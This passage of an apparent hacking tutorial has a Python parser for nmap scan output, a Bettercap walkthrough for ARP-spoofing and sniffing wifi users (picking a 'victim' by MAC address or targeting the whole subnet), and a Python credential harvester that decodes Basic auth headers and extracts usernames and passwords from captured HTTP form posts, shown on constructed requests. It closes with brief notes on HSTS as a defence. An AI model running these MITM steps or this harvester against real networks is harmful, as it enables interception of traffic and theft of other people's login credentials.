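        for field in rest.split("\t"):
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["up"] = value == "Up"
            elif key == "Ports":
                entry["up"] = True        # a port list is only reported for live hosts
                for item in value.split(", "):
                    parts = item.strip().split("/")
                    if len(parts) < 7:
                        continue
                    port, state, proto, _owner, service, _rpc, version = parts[:7]
                    entry["ports"].append({"port": int(port), "state": state,
                                           "proto": proto, "service": service,
                                           "version": version})
    return hosts


def _ip_key(ip):
    return tuple(int(x) for x in ip.split("."))


def live_hosts(hosts):
    return sorted((ip for ip, h in hosts.items() if h["up"]), key=_ip_key)


def open_ports(hosts):
    """{ip: [port, ...]} for hosts with at least one open port."""
    result = {}
    for ip, h in hosts.items():
        ports = sorted(p["port"] for p in h["ports"] if p["state"] == "open")
        if ports:
            result[ip] = ports
    return result


# Constructed -oG output for a small subnet.
SAMPLE = (
    "# Nmap 7.40 scan initiated (constructed sample) as: nmap -sV --open -oG - 192.168.1.0/24\n"
    "Host: 192.168.1.1 (router.lan)\tStatus: Up\n"
    "Host: 192.168.1.1 (router.lan)\tPorts: 53/open/tcp//domain///, 80/open/tcp//http///, "
    "443/open/tcp//https///, 8080/closed/tcp//http-proxy///\tIgnored State: closed (996)\n"
    "Host: 192.168.1.23 ()\tStatus: Up\n"
    "Host: 192.168.1.23 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu/\tIgnored State: filtered (999)\n"
    "Host: 192.168.1.77 ()\tStatus: Down\n"
    "# Nmap done -- 256 IP addresses (2 hosts up) scanned\n"
)

if __name__ == "__main__":
    hosts = parse_grepable(SAMPLE)
    print("live:", live_hosts(hosts))
    print("open:", open_ports(hosts))
```

Diffing open_ports between two runs is the cheapest way to notice a new service showing up on your own network.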

Wifi Sniffing with Bettercap

What is Bettercap?

Bettercap is a powerful tool to perform various types of Man-In-The-Middle (MITM) attacks against the network, manipulate HTTP and HTTPS traffic in realtime and much more.

Some of the main features include:

  • Full and half duplex ARP spoofing.
  • The first real ICMP DoubleDirect spoofing implementation.
  • Configurable DNS spoofing.
  • Realtime and completely automatized host discovery.
  • Realtime credentials harvesting for protocols such as HTTP(S) POSTed data, Basic and Digest Authentications, FTP, IRC, POP, IMAP, SMTP, NTLM ( HTTP, SMB, LDAP, etc ) and more.
  • Fully customizable network sniffer.
  • Modular HTTP and HTTPS transparent proxies with support for user plugins + builtin plugins to inject custom HTML code, JS or CSS files and URLs.
  • SSLStripping.
  • Builtin HTTP server.

And much more! – Bettercap website

To cut it short, this tool can sniff passwords and visited websites, spoof and SSLstrip over wifi networks. Bettercap is not installed in Kali, so install it by typing the command below (this installs the Ruby 1.x series that the commands in this post refer to; bettercap 2.x is a rewrite in Go with a different command syntax):

  • gem install bettercap then press enter

After installing type:

  • bettercap -h  it will give you the commands available for the tool like below

The next part is choosing your victim's address with nmap or airodump-ng. There are a lot of tools to find the connected devices; after choosing your victim, let's move on to the sniffing part!

  • bettercap -X -L -T (mac address…)

While you have the option of choosing your victims one by one, you can also sniff all the devices connected to the network with the next command (with no -T, bettercap targets the whole subnet).

  • bettercap -X -L

There are more useful commands with bettercap; it depends on what you want to capture, and you can even specify the parsers to use with -P. Endless possibilities!
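What the credential parsers in bettercap (and Net-Creds inside MITMf, in the first section) do with each HTTP request once the ARP spoof has put the traffic in front of the sniffer, as one added example covering both sections and belonging to neither tool: parse the request, decode a Basic Authorization header, and pull username/password pairs out of a form-encoded POST body. The two requests are constructed. The field names treated as credentials are an assumption; real parsers carry much longer lists.

```python
# Added example (not bettercap or Net-Creds code): credential harvesting
# from captured plaintext HTTP requests. Requests below are constructed.
import base64
from urllib.parse import parse_qs

USER_FIELDS = {"user", "username", "login", "email", "uid"}       # assumed list
PASS_FIELDS = {"pass", "password", "passwd", "pwd", "passwort"}   # assumed list


def parse_http_request(raw):
    """Split a raw request into method, path, {header: value}, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def harvest(raw):
    """[(kind, where, user, password)] found in one request."""
    method, path, headers, body = parse_http_request(raw)
    found = []
    host = headers.get("host", "")
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        decoded = base64.b64decode(auth[6:]).decode(errors="replace")
        user, _, password = decoded.partition(":")
        found.append(("basic", host, user, password))
    ctype = headers.get("content-type", "")
    if method == "POST" and "application/x-www-form-urlencoded" in ctype:
        fields = {k.lower(): v[0] for k, v in parse_qs(body).items()}
        users = [v for k, v in fields.items() if k in USER_FIELDS]
        passwords = [v for k, v in fields.items() if k in PASS_FIELDS]
        if users and passwords:
            found.append(("form", host + path, users[0], passwords[0]))
    return found


def harvest_all(requests):
    return [hit for raw in requests for hit in harvest(raw)]


# Constructed capture: a form login over plain HTTP and a router admin
# page protected with Basic auth.
_body = "username=alice&password=Summer%2116&remember=1"
POST_REQ = (
    "POST /login HTTP/1.1\r\n"
    "Host: www.bank.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(_body)}\r\n"
    "\r\n" + _body
)
BASIC_REQ = (
    "GET /admin/ HTTP/1.1\r\n"
    "Host: 192.168.1.1\r\n"
    "Authorization: Basic " + base64.b64encode(b"admin:admin123").decode() + "\r\n"
    "\r\n"
)
PLAIN_GET = "GET /index.html HTTP/1.1\r\nHost: www.bank.example\r\n\r\n"

if __name__ == "__main__":
    for hit in harvest_all([POST_REQ, BASIC_REQ, PLAIN_GET]):
        print(hit)
```

Nothing here breaks TLS: the parser only ever sees what the client sent in the clear, which is why SSLstrip and the HSTS bypass matter to the tools on this page and why HSTS preloading defeats them.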